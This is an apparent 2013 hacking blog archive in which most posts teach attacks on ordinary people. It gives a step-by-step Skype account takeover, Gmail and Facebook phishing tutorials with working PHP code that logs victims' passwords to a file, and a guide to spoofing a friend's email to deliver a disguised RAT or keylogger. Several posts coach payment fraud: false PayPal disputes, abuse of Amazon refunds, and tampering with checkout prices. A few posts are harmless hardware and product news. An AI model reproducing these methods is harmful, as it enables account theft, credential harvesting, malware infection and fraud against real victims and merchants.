Wednesday, February 27, 2013

Hack any skype account

Hack any skype account in 6 easy steps

Major vulnerability of Skype's password reset system has went public today.
The only thing you need to obtain full access to any Skype account is primary email of that account (the email which used when the Skype account been registered).
Following guide contains both - how to steal an account, and how to protect your account (scroll down for that).
Update 1 (November 14, 2:00am PDT): Skype made the password reset system disabled. So link on the step 4 is not working for me now (starting from November 14, 2 am PDT).
Update 2 (November 14, 6:00am PDT): Skype re-enabled the password reset system, but now it will not sent recovery token to attacker's client. The hole (gate, almost highway road) is closed.

For example, I know somebody's email - , let's hack his Skype!

1. Go to the Skype website, register new disposable account. In email field, put target's email.

If the email, you typed into form, attached to some skype account, then it will say that "You already have a Skype account", that means you can hack it!
So, complete the form, provide some fake BOD, gender, country, answer to question "How do you intend to use Skype?" as personal, fill any skype name (REMEMBER IT), it will give you some suggestions of not taken ones, assign some password  (REMEMBER IT), solve the captcha, proceed forward - push the continue button. 
You will be redirected to you new account dashboard. Logout from it.
2. Run the Skype application with those new credentials.
3. Since we just logged in to a fresh account, at home screen of the Skype application, there will be advertisement "Find your friends and say hello", click somewhere to bring focus on that part of screen (I clicked where the red cross is drawn):
Then push F5 button on your keyboard, it will refresh the home screen. Do that 3-4 times until you see "Bring your Facebook friends into Skype" advertisement. Click "No thanks, blah-blah-blah".
You will get the home screen with some banner. 
4. Go to Skype's password reset system.Put the target's email. In my case - .
Click "Submit button", and after several seconds, you will see Skype's pop-up notification - "Password token".
5. Go to Skype application, on the home screen you will see Password token, click on "more info", go to "temporary code link":
6. Browser will open page, where you can select any skype account registered to target email, in my case there are two account - my disposable and target:
Choose target's account and click "Change password and sign me in":
 You will be redirected to login form:

You are all set!
P.S. I have changed primary email for that test accounts, so do not try hack them. Just in case. =)

How to protect your accounts

You already changed password for the target account, know the skype login, and able to use that target skype account. But somebody could take it back from you, just as you did (owner for example).
To prevent that you need to change your primary email to some address, unknown to anyone.

To do that:
1. Sign in on skype website.
2. Go into the "profile" link (click to enlarge):

3. On account information, go down, to "Contact details", click "Add email address":
4. Add your email address, which unknown to anybody, but you:
Click save button at the bottom of the form. After page reload, refresh page again to prevent some strange glitches of the site (if you will not reload the page, after you do following steps, it will forget steps 4 and 5 and discard that little work).
5. Scroll to Contact details again. Click on "Add email address" again. Switch primary email to the new one:
Click "Save" button at the bottom of the form, again.
It will ask you for your password. You know it already. Type password and click button by mouse, not by "Enter" key.
After page reload, refresh page again to prevent some strange glitches of the site (described above).
6. Scroll to Contact details again. Click on "Add email address" again. Delete (with backspace and/or delete buttons) all emails but primary:

7. Click "Save" button at the bottom of the form. Make sure all your changes applied (it sometimes require two or more attempts, since the site is developed by curly-handed programmers).
8. Tell to friends how to protect a skype account. ASAP
At the time there is no other way to protect your skype account, except changing of primary email to some unknown address.
Once account is stolen, it has ability to retrieve all your IM history from other peers.
If you already lost your account, contact to all your necessary contacts and tell them to remove you from their contact list. It prevents IM history interchange (if it is not already happened).

There is how mailbox of target looks like:

Thus target will receive notifications regarding password change, but initial owner have less than one minute to understand and take action, it is almost impossible to login into skype website, change emails, when a hacker already there.
Disclaimer: The information provided on in this blog is to be used for educational purposes only. The blog author is in no way responsible for any misuse of the information provided.

Wednesday, February 20, 2013

Pair of musical hacks use sensor arrays as keyboards


Pair of musical hacks use sensor arrays as keyboards

This pair of musical keyboard hacks both use light to detect inputs. The pair of tips came in on the same day, which sparks talk of consipiracy theory here at Hackaday. Something in the weather must influence what types of projects people take on because we frequently see trends like this one. Video of both projects is embedded after the jump.

On the left is a light-sensitive keyboard which [Kaziem] is showing off. In this image he’s rolling a marble around on the surface. As it passes over the Cadmium Sulfide sensors (which are arranged in the pattern of white and black keys from a piano keyboard) the instrument plays pitches based on the changing light levels. [Thanks Michael via Make]

To the right is [Lex's] proximity sensor keyboard. It uses a half-dozen Infrared proximity sensor which pick up reflected light. He calls it a ‘quantised theremin’ and after seeing it in action we understand why. The overclocked Raspberry Pi playing the tones reacts differently based on distance from the keyboard itself, and hand alignment with the different sensors.

Sunday, February 17, 2013

Facebook Account Deleter

Facebook Account Deleter (100% Working)


Download ... ersion.rar


1).Net Framework 4 Client Profile (x86 and x64) / If you dont have it, download it from here:
2)Microsoft Visual Basic Power Packs 3.0 / If you dont have it, download it from here:
3)Finally, download this:

One of the best tool every take it today to delete others account. It is 100% virus free I have personally tested it.

Saturday, February 16, 2013

VM Ware Fusion 3.1

VMWare Fusion 3.1 Beta On Grounds

Check out the VMWare Fusion 3.1 Beta which have been out just now. Its includes some of the significant features which many of the users have been waiting for. Some of them are really good which mostly includes graphic issues.

VMWare have been the major choice for the users to run Windows on Mac and pentesting for most of us on windows. The Beat 3.1 is out which have some major improvements in 3D application like games and windows Aero stuff…

OpenGL 2.1 is now also supported in this version for Windows 7 and Windows Vista. They claim better DirectX 9.0 SM3 performance as well (and hopefully that means more DirectX 9.0C app compatibility).

You can configure larger virtual machines as well, with the maximum virtual disk expanded from 950 GB to 2 TB. They now support up to 8-way symmetric multiprocessing as well. These are some of the features you will see in this Beat version.

You can download the beta here, test it, and have some of the nice features early for your use. If you want you can also give some tips to them and help them get doing the thing done fast for the final version.

So there you go - Download

Suffering Connection Issues

XBox Live Hacked or Suffering Connection Issues

Today Xbox Live users are suffering some Connection Issues and this is excepted as yesterday only the Xbox live account of Xbox’s Live Programming director’s was Hacked. So this points to the Xbox Live is been hacked aka compromised.
It is more likely that the Xbox live is hacked as the account of one of the makers of the Xbox live account was hacked yesterday only. While this can be a Connection issues too as the Expansion pack of Modern Warfare : “Stimulus Package” is out today which may have caused problems for the Xbox live servers as of large incensement in the connections ...

Xbox Support’s Twitter account is loaded with communications with customers about the problem, and the official support website at is being bombarded by users.

“We’re aware of the issue and it is being worked on. Stay tuned for updates.”

An error code of 80150019 have been shown to the users of the Xbox live users. As the users are like not happy with this situation and would be likely as the Microsoft is in problems again.

… Talking about the Hacked account of Major Nelson’s of Xbox Live, Shortly after the hack happened, the Web site Lightzz took credit for the hack, posting a video of it, along with the hacker's Skype name. He is offering to hack other accounts as well.

Well whatever is going we will update this post as soon as Microsoft figures it out is it hacked or connection issues.

Watch free movie online

How to watch a movie on for FREE

This is really simple... All you need is an Amazon account with at least $5 balance.

1. Go to

2. Sign it your account.

3. Watch a movie on Amazon (1 day rental), and after it is done and the money has been deducted from your amazon account, contact support.

5. Tell their support that you accidentally clicked on the movie and didn't want to rent it. Ask them for a refund of the rental to your account.

6. They should respond with 2 days and the refunded amount should be in your account.

(I'm not sure how many times you can do this on a single account before they catch on.) So Try creating multiple accounts :D

Premium Account

Get FILEBOX.COM Premium Account for FREE

Cyberlocker Switzerland has purchased and thus they have launched a new affiliate program for it.

In order, to promote the site they are offering the following for the site:

1. 6 month free premium account

2. 90% payout on all Premium Sales from your files
Use the coupon code


to get your Premium 6 month account ! So jus go n register with this coupon code..

Monday, February 11, 2013

Social Engineering

What is Social Engineering?

Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.

"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker.

Gmail hacking

Gmail Hacked
 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

 Upload those image to tinypic or  copy the url of each image.

Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the


Replace it with

action="http://yoursite urlhere/login.php"

 save the file.

Now you need to create login.php
 so you need to open the notepad and type as

header("Location: ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these, or 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: .  find best secure connection site.

Step 8: 
create an email with gmail keyword.
 like :

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

For user to believe change Your phishing web page url with any of free short url sites. 
Like :,, 
This will make users to believe that it is correct url

Facebook Phisher

Facebook Phisher 

My readers use to ask how to hack Facebook accounts.  Most of the people curious to know how hackers take control of their accounts.  In this post, let me clarify those doubts.

Here, i am going to explain one of the popular social engineering attack(luring user into do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.

Step 1:
To make a fake page of the target website , You can simply the source code of the website and save as html page.   In our case , it is facebook.  Go to facebook and right click on website .  Select "View source" and copy the code to notepad.

Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:

Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form(In our case, login-form) is submitted.

In the above code, the action attribute has the value that points to facebook login php file (  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed '' from the value.

Save the file as index.html.

Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:
header("Location: ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

save this file as "login.php"

Step 4:
Open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : ''.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 

Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.

Saturday, February 9, 2013

Share cash premium account

How to get a FREE ShareCash Premium Account.

I bet most of you here have heard of Share right?

Here is how to avoid completing surveys on their site.
 This following method has worked numerous times.
Send an email to admin@share with something like this- Hello, I am just writing this email to bring attention to the faulty survey system, I have tried multipul times to unlock a simple .01kb file, and failed, nearly 2 hours wasted.
I have now signed up to over 20 different product mailing lists, entered my phone for multiple billing services and completed numerous surveys, but still my download is still locked.
It unlocked once, but my browser immediated blocked the download.
Regards. If it worked correctly, he will reply back to your email with a free 2 Day Premium Account. Enjoy!
 Have fun downloading some fake generators.

Amazon pirated

How to watch a movie on for FREE This is really simple...
All you need is an Amazon account with at least $5 balance.
1. Go to
2. Sign it your account.

3. Watch a movie on Amazon (1 day rental)

4. After it is done and the money has been deducted from your amazon account, contact support.

5. Tell their support that you accidentally clicked on the movie and didn't want to rent it. Ask them for a refund of the rental to your account.

6. They should respond with 2 days and the refunded amount should be in your account. (I'm not sure how many times you can do this on a single account before they catch on.)

So Try creating multiple accounts :D

Free pizza online

How To Get Free Dominos Pizzas Want free pizza? Read below...
You need PayPal and you also need to be in a place that Dominos deliver to.

1. Go to

2. Order a pizza.

3. Receive the pizza.

4. Take pictures of your pizza and post them here.

5. Go to PayPal.

6. Dispute the payment. (Say that the pizza never arrived or say that the pizza was cold. They can't prove you wrong.)

7. Eat your pizza and wait for your payment to be reversed.

Free purchase

Get anything on amazon/paypal checkout for free

I'm not going to do this and never have done it because it is illegal and unethical but it is possible to get anything on paypal checkout or for free using tamper data, a firefox addon.

You basically edit the website's code to make the price of the item 0 bucks, or one cent.

No money (or a penny) is actually being sent to the seller so you can see why you're better off legally buying hong kong ass penny auctions off ebay.

Here is a video showing it on PP checkout:

I bet ninja remote above already caught on to this by now if people are actually doing exactly what the above guy did in that video.

Here is a video of it being done on amazon:

This exploit is detectable because, like I said, no money is going in from you. Use at your own risk. This can also be used for other sites as well.

Hack Facebook

Hack almost everyone. every FACEBOOK and EMAIL (via facebook) 100% hack

TUTORIAL: Hack anyone Facebook,email or PC....

This tutorial is like a spreading tutorial way basically. But more precise and powerful.

click here to download the hackers kit For free MOSTLY I HAVE HACKED GIRLS WITH THIS METHOD (because they don't get fooled so easily by a poser and other shit. So this thing can do it)Hehe


1) A fully FUD server(SERVER BEING FUD is the most important part of the hack)
2) Patience

That's all...

Now coming to the hack...

there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting... so read one and make your server fully fud...

Now do just as what i say:-

1) go to "" and leave that tab open

2) now login to your facebook and copy the username of the person(FB username) you want to hack

like this....

so basically the name after the is the username...

in my example "RANDOM" is the username....

if the link shows url like "" then you cannot use this method on them....

3) as you are the friend of the person you must know who he his/her best friend or just close friend....

so basically get his email id attached to his Facebook like

[this can be hard if you don't have this person as your friend]

anyways you can ask his/her email id if you know him....

4)Now just open that spoofer tab and paste the info as follows:-

in Spoofed Email: the id you stolen from the contact info: ex:

in Targets Email:, ex:

in Reply Email: same as spoofed email

in message title: hi or whatever

in message body : Hi check out my new pics uploaded here: "link of your key-logger,rat or whatever"




1) If you are using the message from the example then i suggest you to download some of the spoofed person(slave friend)

pictures and use icon-changer to change your server icon to JPEG icon and put all that pics and your server to an .rar file and

upload it to the hosting site....

Lol,,,, no one sees the extension if you do this thing..

2) use rat's crew extension spoofer to change the extension to JPEG and change server icon to JPEG too....

Cyber lock

Get FILEBOX.COM Premium Account for FREE
Cyberlocker Switzerland has purchased and thus they have launched a new affiliate program for it.

In order, to promote the site they are offering the following for the site:

1. 6 month free premium account

2. 90% payout on all Premium Sales from your files
Use the coupon code


to get your Premium 6 month account ! So jus go n register with this coupon code..